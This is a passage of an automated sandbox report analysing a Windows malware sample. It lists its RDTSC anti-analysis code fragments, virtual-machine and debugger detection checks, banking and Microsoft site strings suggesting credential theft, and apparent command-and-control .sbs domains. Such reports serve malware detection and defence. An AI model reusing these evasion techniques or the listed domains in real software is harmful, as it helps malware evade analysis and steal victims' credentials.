              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110C2F second address: 5110C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110C4C second address: 5110CBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F15FCC2EA70h 0x00000013 add si, BB58h 0x00000018 jmp 00007F15FCC2EA6Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F15FCC2EA78h 0x00000024 or ecx, 5BFFC5B8h 0x0000002a jmp 00007F15FCC2EA6Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [esp], ebp 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F15FCC2EA72h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110D5B second address: 5110DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F15FCD6BB63h 0x0000000b or si, DA5Eh 0x00000010 jmp 00007F15FCD6BB69h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 284FBBE7h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110DA1 second address: 5110DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110E82 second address: 5110EEF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F15FCD6BB62h 0x00000008 adc ax, DC98h 0x0000000d jmp 00007F15FCD6BB5Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 je 00007F166E59F630h 0x0000001c jmp 00007F15FCD6BB66h 0x00000021 cmp dword ptr [ebp+08h], 00002000h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov dx, 3D10h 0x0000002f jmp 00007F15FCD6BB69h 0x00000034 popad 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110EEF second address: 5110EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110EF5 second address: 5110EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110EF9 second address: 5110EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120A8B second address: 5120AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F15FCD6BB5Dh 0x00000012 xchg eax, esi 0x00000013 jmp 00007F15FCD6BB5Eh 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F15FCD6BB5Eh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120AC5 second address: 5120B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F15FCC2EA76h 0x0000000f mov esi, dword ptr [ebp+0Ch] 0x00000012 jmp 00007F15FCC2EA70h 0x00000017 test esi, esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F15FCC2EA6Eh 0x00000020 adc esi, 25DAB048h 0x00000026 jmp 00007F15FCC2EA6Bh 0x0000002b popfd 0x0000002c movzx eax, dx 0x0000002f popad 0x00000030 je 00007F166E45C2F7h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push esi 0x0000003a pop edx 0x0000003b pushfd 0x0000003c jmp 00007F15FCC2EA78h 0x00000041 adc cx, 55D8h 0x00000046 jmp 00007F15FCC2EA6Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120B5C second address: 5120BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 push eax 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [769B459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F15FCD6BB5Fh 0x0000001b sbb eax, 10BCC54Eh 0x00000021 jmp 00007F15FCD6BB69h 0x00000026 popfd 0x00000027 mov dx, si 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120BA5 second address: 5120C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 02h 0x00000005 pushfd 0x00000006 jmp 00007F15FCC2EA74h 0x0000000b adc ecx, 0EC544F8h 0x00000011 jmp 00007F15FCC2EA6Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F166E474329h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F15FCC2EA74h 0x00000027 xor esi, 4B869F58h 0x0000002d jmp 00007F15FCC2EA6Bh 0x00000032 popfd 0x00000033 pushad 0x00000034 jmp 00007F15FCC2EA76h 0x00000039 pushfd 0x0000003a jmp 00007F15FCC2EA72h 0x0000003f sub eax, 2511F0E8h 0x00000045 jmp 00007F15FCC2EA6Bh 0x0000004a popfd 0x0000004b popad 0x0000004c popad 0x0000004d xchg eax, esi 0x0000004e jmp 00007F15FCC2EA76h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F15FCC2EA6Dh 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120C69 second address: 5120C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120C7E second address: 5120C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120C84 second address: 5120C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D93 second address: 5120DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA78h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120DAF second address: 5120E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e mov bx, 7D84h 0x00000012 pushfd 0x00000013 jmp 00007F15FCD6BB5Dh 0x00000018 or esi, 46B1ECC6h 0x0000001e jmp 00007F15FCD6BB61h 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F15FCD6BB68h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120E0C second address: 5120E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120E10 second address: 5120E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120E16 second address: 5120E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA6Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BDFEF second address: 62BD8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 jmp 00007F15FCD6BB5Eh 0x0000000c push dword ptr [ebp+122D16F5h] 0x00000012 or dword ptr [ebp+122D2D1Ch], ebx 0x00000018 mov dword ptr [ebp+122D30EEh], eax 0x0000001e call dword ptr [ebp+122D29B1h] 0x00000024 pushad 0x00000025 pushad 0x00000026 add edx, dword ptr [ebp+122D3674h] 0x0000002c call 00007F15FCD6BB5Ah 0x00000031 sub dword ptr [ebp+122D1D1Dh], ebx 0x00000037 pop edx 0x00000038 popad 0x00000039 xor eax, eax 0x0000003b clc 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 cld 0x00000041 mov dword ptr [ebp+122D3500h], eax 0x00000047 jmp 00007F15FCD6BB67h 0x0000004c mov esi, 0000003Ch 0x00000051 mov dword ptr [ebp+122D2461h], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b stc 0x0000005c jnl 00007F15FCD6BB61h 0x00000062 lodsw 0x00000064 jmp 00007F15FCD6BB67h 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jnl 00007F15FCD6BB5Ch 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 or dword ptr [ebp+122D2590h], esi 0x0000007d nop 0x0000007e pushad 0x0000007f jmp 00007F15FCD6BB5Fh 0x00000084 jl 00007F15FCD6BB5Ch 0x0000008a popad 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e js 00007F15FCD6BB58h 0x00000094 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642FA81 second address: 642FA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCC2EA6Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6430028 second address: 6430031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6430031 second address: 6430052 instructions: 0x00000000 rdtsc 0x00000002 js 00007F15FCC2EA72h 0x00000008 jp 00007F15FCC2EA66h 0x0000000e jns 00007F15FCC2EA66h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6430052 second address: 6430056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6431AF1 second address: 6431B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jne 00007F15FCC2EA68h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6431B07 second address: 6431B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F15FCD6BB56h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jns 00007F15FCD6BB56h 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F15FCD6BB5Bh 0x0000001f pop eax 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 jmp 00007F15FCD6BB61h 0x0000002b push edx 0x0000002c jmp 00007F15FCD6BB68h 0x00000031 pop edx 0x00000032 popad 0x00000033 pop eax 0x00000034 jno 00007F15FCD6BB59h 0x0000003a push 00000003h 0x0000003c movsx edi, ax 0x0000003f push 00000000h 0x00000041 jmp 00007F15FCD6BB5Bh 0x00000046 push 00000003h 0x00000048 sbb dl, 00000003h 0x0000004b push 48393998h 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64440F6 second address: 64440FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641CDF2 second address: 641CDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641CDF6 second address: 641CDFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451C24 second address: 6451C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451C2A second address: 6451C30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451D88 second address: 6451D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451D8C second address: 6451D97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451D97 second address: 6451DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F15FCD6BB56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451DA1 second address: 6451DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451DA7 second address: 6451DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F15FCD6BB5Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451DB9 second address: 6451DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6451DBD second address: 6451DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6452656 second address: 645265C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B5BB00 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D2E8DC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D98A66 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62BD7EA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62BD8F7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62BD811 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 646899F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64EE8EA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62C207F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3236Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 948Thread sleep time: -38019s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2244Thread sleep time: -34017s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: file.exe, 00000000.00000002.2597614504.0000000000CE6000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2602729436.0000000006439000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: file.exe, 00000000.00000002.2598450174.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: file.exe, 00000000.00000003.2261494179.0000000005B3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: file.exe, 00000000.00000002.2598717064.0000000001286000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: file.exe, 00000000.00000002.2598450174.0000000001251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: file.exe, 00000000.00000002.2597614504.0000000000CE6000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2602729436.0000000006439000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2261494179.0000000005B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exe, 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
              Source: file.exe, 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
              Source: file.exe, 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
              Source: file.exe, 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
              Source: file.exe, 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: file.exe, 00000000.00000002.2602729436.0000000006439000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Qx>Program Manager
              Source: file.exe, 00000000.00000002.2597614504.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: #Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
